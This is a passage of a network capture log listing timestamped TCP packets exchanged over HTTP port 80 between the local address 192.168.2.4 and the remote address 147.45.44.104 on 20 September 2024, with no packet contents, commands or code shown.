Sep 20, 2024 11:08:01.835513115 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835529089 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835532904 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835532904 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835546017 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835563898 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835580111 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835596085 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835608006 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835608006 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835608006 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835613966 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835633039 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835633039 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835650921 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835660934 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835676908 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835684061 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835695028 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835702896 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835712910 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835720062 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835730076 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835736990 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835752010 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835752964 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835771084 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835777998 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835789919 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.835797071 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835818052 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.835836887 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836194992 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836210012 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836224079 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836249113 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836261988 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836266041 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836282015 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836294889 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836294889 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836302042 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836316109 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836324930 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836340904 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836340904 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836342096 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836359978 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836370945 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836375952 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.836409092 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.836409092 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837155104 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837169886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837186098 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837209940 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837213039 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837229013 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837232113 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837245941 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837259054 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837296963 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837754011 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837769032 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837810040 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837838888 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837867975 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837882996 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837898016 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837915897 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837915897 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837934017 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837939978 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837939978 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837954044 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837960005 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837971926 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837979078 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.837989092 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.837995052 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838007927 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.838013887 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838031054 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838046074 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838535070 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.838557959 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.838574886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.838587999 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838618994 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838618994 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.838624001 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.838666916 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924757004 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924773932 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924796104 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924810886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924828053 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924846888 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924830914 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924861908 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924880981 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924885988 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924885988 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924911022 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924925089 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.924938917 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.924962044 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925148010 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925162077 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925178051 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925196886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925196886 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925215960 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925223112 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925223112 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925235033 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925241947 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925255060 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925259113 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925273895 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925277948 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925292015 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925296068 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925312042 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925316095 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925333023 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925348997 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925657988 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925708055 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925724030 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925745010 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925745964 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925765038 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925770044 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925784111 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925821066 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925821066 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925846100 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925859928 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925879002 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925882101 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925898075 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925901890 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925921917 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925940037 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.925978899 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.925993919 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926009893 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926028967 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926034927 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926034927 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926048040 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926064014 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926064014 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926081896 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926093102 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926107883 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926143885 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926143885 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926522970 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926537991 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926551104 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926565886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926585913 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926615000 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926636934 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926650047 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926666021 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926681042 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926683903 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926697969 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926712990 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926733017 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926770926 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926785946 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926800966 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926815987 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926820993 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926841021 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926841021 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926858902 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926903009 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926917076 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926934958 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926950932 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926950932 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926954031 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.926970959 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.926989079 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927433014 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927486897 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927491903 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927501917 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927531958 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927578926 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927676916 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927691936 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927720070 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927736998 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927738905 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927751064 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927772045 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927778006 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927793026 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927799940 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927810907 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927829027 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927835941 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927835941 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927860975 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927865982 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927880049 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.927881956 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.927907944 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928112030 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928127050 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928154945 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928154945 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928164959 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928175926 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928204060 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928420067 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928433895 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928451061 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928462029 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928493023 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928493023 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928544998 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928561926 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928590059 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928599119 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928608894 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928615093 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928639889 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928658962 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928718090 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928730965 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928747892 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928761005 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928765059 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928780079 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928783894 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928803921 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928803921 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928803921 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928822041 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928826094 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928843021 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928853035 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928863049 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.928872108 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928889990 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.928908110 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.929303885 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.929318905 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.929332972 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:01.929357052 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:01.929387093 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019203901 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019224882 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019253969 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019294977 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019301891 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019294977 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019294977 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019324064 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019339085 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019359112 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019378901 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019406080 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019413948 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019413948 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019413948 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019421101 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019437075 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019443035 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019457102 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019464016 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019474983 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019486904 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019491911 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019507885 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019509077 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019529104 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019551039 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019853115 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019890070 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019893885 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019913912 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019931078 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019937038 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019948959 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019954920 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019973993 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019974947 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.019994020 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.019994020 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020013094 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020019054 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020031929 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020039082 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020049095 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020068884 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020076036 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020076990 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020087004 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020106077 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020107985 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020107985 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020127058 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020128012 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020144939 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020149946 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020165920 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020180941 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020181894 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020199060 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020210981 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020215988 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020230055 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020251989 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020253897 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020267963 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020292997 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020297050 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020308018 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020325899 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020334005 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020353079 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020359993 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020390034 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020390034 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020415068 CEST	49762	80	192.168.2.4	147.45.44.104
